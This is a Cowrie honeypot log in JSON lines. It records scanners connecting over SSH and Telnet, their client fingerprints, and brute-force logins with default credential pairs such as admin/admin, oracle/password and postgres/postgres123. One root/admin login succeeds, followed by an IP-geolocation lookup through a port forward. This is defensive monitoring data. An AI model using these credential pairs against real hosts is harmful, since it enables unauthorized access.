{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:27:09.323863Z","src_ip":"194.233.79.134","session":"2bb7b83861c7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:27:09.334183Z","src_ip":"212.227.125.160","session":"ea4b47457227"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:27:10.454874Z","src_ip":"194.233.79.134","session":"2bb7b83861c7"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"elastic","message":"login attempt [elastic/elastic] failed","sensor":"my-vps","timestamp":"2025-08-28T00:27:12.960190Z","src_ip":"194.233.79.134","session":"2bb7b83861c7"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:27:14.206074Z","src_ip":"194.233.79.134","session":"2bb7b83861c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd98b63c16fe","protocol":"ssh","message":"New connection: 212.227.125.160:65105 (1.2.3.4:22) [session: dd98b63c16fe]","sensor":"my-vps","timestamp":"2025-08-28T00:27:30.848717Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:27:30.906183Z","src_ip":"212.227.125.160","session":"dd98b63c16fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36430,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc5fb24e5f12","protocol":"ssh","message":"New connection: 212.227.235.229:36430 (1.2.3.4:22) [session: dc5fb24e5f12]","sensor":"my-vps","timestamp":"2025-08-28T00:28:35.664942Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:28:35.772536Z","src_ip":"212.227.235.229","session":"dc5fb24e5f12"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":52860,"dst_ip":"1.2.3.4","dst_port":22,"session":"60d22fbd30bb","protocol":"ssh","message":"New connection: 194.233.79.134:52860 (1.2.3.4:22) [session: 60d22fbd30bb]","sensor":"my-vps","timestamp":"2025-08-28T00:28:59.934912Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:28:59.935649Z","src_ip":"194.233.79.134","session":"60d22fbd30bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:29:00.273353Z","src_ip":"194.233.79.134","session":"60d22fbd30bb"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T00:29:01.033839Z","src_ip":"194.233.79.134","session":"60d22fbd30bb"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:29:02.694169Z","src_ip":"194.233.79.134","session":"60d22fbd30bb"}
{"eventid":"cowrie.session.connect","src_ip":"122.197.32.35","src_port":45694,"dst_ip":"1.2.3.4","dst_port":23,"session":"db8ca877e0e2","protocol":"telnet","message":"New connection: 122.197.32.35:45694 (1.2.3.4:23) [session: db8ca877e0e2]","sensor":"my-vps","timestamp":"2025-08-28T00:29:20.571216Z"}
{"eventid":"cowrie.session.closed","duration":12.912086248397827,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:29:33.483228Z","src_ip":"122.197.32.35","session":"db8ca877e0e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34138,"dst_ip":"1.2.3.4","dst_port":22,"session":"c02e05115fd4","protocol":"ssh","message":"New connection: 212.227.125.160:34138 (1.2.3.4:22) [session: c02e05115fd4]","sensor":"my-vps","timestamp":"2025-08-28T00:29:41.802406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:29:41.805006Z","src_ip":"212.227.125.160","session":"c02e05115fd4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:29:42.028527Z","src_ip":"212.227.125.160","session":"c02e05115fd4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T00:29:43.407693Z","src_ip":"212.227.125.160","session":"c02e05115fd4"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:29:44.791595Z","src_ip":"212.227.125.160","session":"c02e05115fd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39814,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2bc59f0e783","protocol":"ssh","message":"New connection: 212.227.125.160:39814 (1.2.3.4:22) [session: a2bc59f0e783]","sensor":"my-vps","timestamp":"2025-08-28T00:29:58.620285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:29:58.624563Z","src_ip":"212.227.125.160","session":"a2bc59f0e783"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:29:58.859868Z","src_ip":"212.227.125.160","session":"a2bc59f0e783"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T00:29:59.907468Z","src_ip":"212.227.125.160","session":"a2bc59f0e783"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T00:30:01.349807Z","session":"a2bc59f0e783"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T00:30:01.634500Z","src_ip":"212.227.125.160","session":"a2bc59f0e783"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:30:01.900877Z","src_ip":"212.227.125.160","session":"a2bc59f0e783"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.151.203","src_port":48606,"dst_ip":"1.2.3.4","dst_port":22,"session":"96f679207e70","protocol":"ssh","message":"New connection: 171.243.151.203:48606 (1.2.3.4:22) [session: 96f679207e70]","sensor":"my-vps","timestamp":"2025-08-28T00:30:29.438128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:30:29.576868Z","src_ip":"171.243.151.203","session":"96f679207e70"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:30:36.039157Z","src_ip":"171.243.151.203","session":"96f679207e70"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":42416,"dst_ip":"1.2.3.4","dst_port":22,"session":"e258714c7654","protocol":"ssh","message":"New connection: 194.233.79.134:42416 (1.2.3.4:22) [session: e258714c7654]","sensor":"my-vps","timestamp":"2025-08-28T00:30:46.059341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:30:46.150895Z","src_ip":"194.233.79.134","session":"e258714c7654"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:30:46.245806Z","src_ip":"194.233.79.134","session":"e258714c7654"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-28T00:30:47.756934Z","src_ip":"194.233.79.134","session":"e258714c7654"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:30:49.579284Z","src_ip":"194.233.79.134","session":"e258714c7654"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48214,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fac8e77ff3d","protocol":"ssh","message":"New connection: 212.227.125.160:48214 (1.2.3.4:22) [session: 3fac8e77ff3d]","sensor":"my-vps","timestamp":"2025-08-28T00:30:52.840247Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:30:52.841626Z","src_ip":"212.227.125.160","session":"3fac8e77ff3d"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:31:22.627198Z","src_ip":"212.227.125.160","session":"3fac8e77ff3d"}
